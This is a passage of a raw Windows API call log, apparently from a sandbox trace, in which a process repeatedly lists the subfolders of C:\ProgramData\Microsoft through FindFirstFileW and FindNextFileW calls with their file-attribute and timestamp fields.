lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DRM", cAlternateFileName="")) returned 1 [0132.227] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eHome", cAlternateFileName="")) returned 1 [0132.227] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Event Viewer", cAlternateFileName="EVENTV~1")) returned 1 [0132.227] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0132.291] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0132.291] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MF", cAlternateFileName="")) returned 1 [0132.291] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSDN", cAlternateFileName="")) returned 1 [0132.291] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0132.291] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0132.292] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE", cAlternateFileName="")) returned 1 [0132.292] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0132.292] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RAC", cAlternateFileName="")) returned 1 [0132.292] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0132.292] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0132.292] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0132.293] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 1 [0132.293] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x60ae73a0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x60ae73a0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0132.293] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x591e8ca0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x591e8ca0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0132.293] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0132.293] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 1 [0132.293] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 0 [0132.294] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f43c) returned 1 [0132.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f448) returned 1 [0132.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f47c) returned 1 [0132.294] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft", nBufferLength=0x105, lpBuffer=0x691ef84, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft", lpFilePart=0x0) returned 0x18 [0132.294] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\", nBufferLength=0x105, lpBuffer=0x691ef58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\", lpFilePart=0x0) returned 0x19 [0132.294] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\*", lpFindFileData=0x691f1a4 | out: lpFindFileData=0x691f1a4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.294] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.294] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Assistance", cAlternateFileName="ASSIST~1")) returned 1 [0132.295] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0132.295] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0132.295] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0132.295] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DRM", cAlternateFileName="")) returned 1 [0132.295] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eHome", cAlternateFileName="")) returned 1 [0132.295] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Event Viewer", cAlternateFileName="EVENTV~1")) returned 1 [0132.295] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0132.296] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0132.296] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MF", cAlternateFileName="")) returned 1 [0132.296] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSDN", cAlternateFileName="")) returned 1 [0132.296] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0132.296] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0132.296] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE", cAlternateFileName="")) returned 1 [0132.296] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0132.296] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RAC", cAlternateFileName="")) returned 1 [0132.297] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0132.297] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0132.297] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0132.297] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 1 [0132.297] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x60ae73a0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x60ae73a0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0132.297] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x591e8ca0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x591e8ca0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0132.297] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, 